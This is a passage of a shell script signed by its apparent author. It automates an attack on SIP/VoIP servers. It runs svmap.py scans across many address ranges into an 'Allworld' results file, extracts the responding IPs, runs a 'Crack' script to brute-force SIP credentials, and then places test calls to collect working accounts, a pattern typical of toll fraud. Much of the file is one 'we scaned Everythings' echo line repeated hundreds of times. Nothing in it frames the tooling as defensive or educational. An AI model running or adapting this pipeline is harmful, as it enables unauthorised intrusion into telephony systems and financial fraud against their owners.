         echo ----------------- $VAR211----------------
python svmap.py -t0.0 $VAR211 -m  -v >> =Allworldresult.txt

         echo ----------------- $VARAllworld----------------
python svmap.py -t0.0 $VARAllworld -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR213----------------
python svmap.py -t0.0 $VAR213 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR214----------------
python svmap.py -t0.0 $VAR214 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR215----------------
python svmap.py -t0.0 $VAR215 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR216----------------
python svmap.py -t0.0 $VAR216 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR217----------------
python svmap.py -t0.0 $VAR217 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR218----------------
python svmap.py -t0.0 $VAR218 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR219----------------
python svmap.py -t0.0 $VAR219 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR220----------------
python svmap.py -t0.0 $VAR220 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR221----------------
python svmap.py -t0.0 $VAR221 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR222----------------
python svmap.py -t0.0 $VAR222 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR223----------------
python svmap.py -t0.0 $VAR223 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR224----------------
python svmap.py -t0.0 $VAR224 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR225----------------
python svmap.py -t0.0 $VAR225 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR226----------------
python svmap.py -t0.0 $VAR226 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR227----------------
python svmap.py -t0.0 $VAR227 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR228----------------
python svmap.py -t0.0 $VAR228 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR229----------------
python svmap.py -t0.0 $VAR229 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR230----------------
python svmap.py -t0.0 $VAR230 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR231----------------
python svmap.py -t0.0 $VAR231 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR232----------------
python svmap.py -t0.0 $VAR232 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR233----------------
python svmap.py -t0.0 $VAR233 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR234----------------
python svmap.py -t0.0 $VAR234 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR235----------------
python svmap.py -t0.0 $VAR235 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR236----------------
python svmap.py -t0.0 $VAR236 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR237----------------
python svmap.py -t0.0 $VAR237 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR238----------------
python svmap.py -t0.0 $VAR238 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR239----------------
python svmap.py -t0.0 $VAR239 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR240----------------
python svmap.py -t0.0 $VAR240 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR241----------------
python svmap.py -t0.0 $VAR241 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR242----------------
python svmap.py -t0.0 $VAR242 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR243----------------
python svmap.py -t0.0 $VAR243 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR244----------------
python svmap.py -t0.0 $VAR244 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR245----------------
python svmap.py -t0.0 $VAR245 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR246----------------
python svmap.py -t0.0 $VAR246 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR247----------------
python svmap.py -t0.0 $VAR247 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR248----------------
python svmap.py -t0.0 $VAR248 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR249----------------
python svmap.py -t0.0 $VAR249 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR250----------------
python svmap.py -t0.0 $VAR250 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR251----------------
python svmap.py -t0.0 $VAR251 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR252----------------
python svmap.py -t0.0 $VAR252 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR253----------------
python svmap.py -t0.0 $VAR253 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR254----------------
python svmap.py -t0.0 $VAR254 -m  -v >> =Allworldresult.txt

         echo ----------------- $VAR255----------------
python svmap.py -t0.0 $VAR255 -m  -v >> =Allworldresult.txt



echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
sleep 5

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"


grep -Po "(\d+\.){3}\d+:?(\d?){6}" =Allworldresult.txt > IPS
perl run IPS
cat 401.pal 400.pal 403.pal 404.pal 500.pal 486.pal 484.pal 407.pal 480.pal 482.pal >> ipSIP
rm IPSx # remove the file IPS
mv =Allworldresult.txt Allworld5060.txt # change file name
sleep 1

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 2500 2 ipSIP
rm ipSIPMOHAMMAD # remove the file ipSIP
sudo rm *.pal # remove the file

sleep 1


# Testing SIP prefix

echo -e "\nStart Testing ...\n"

perl call VOIPresult 1000 20 >> test.txt

cat test.txt |  grep "success"  > CALL.txt
sort -u CALL.txt > successCALL.txt
rm test.txt
rm CALL.txt
sleep 1

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"
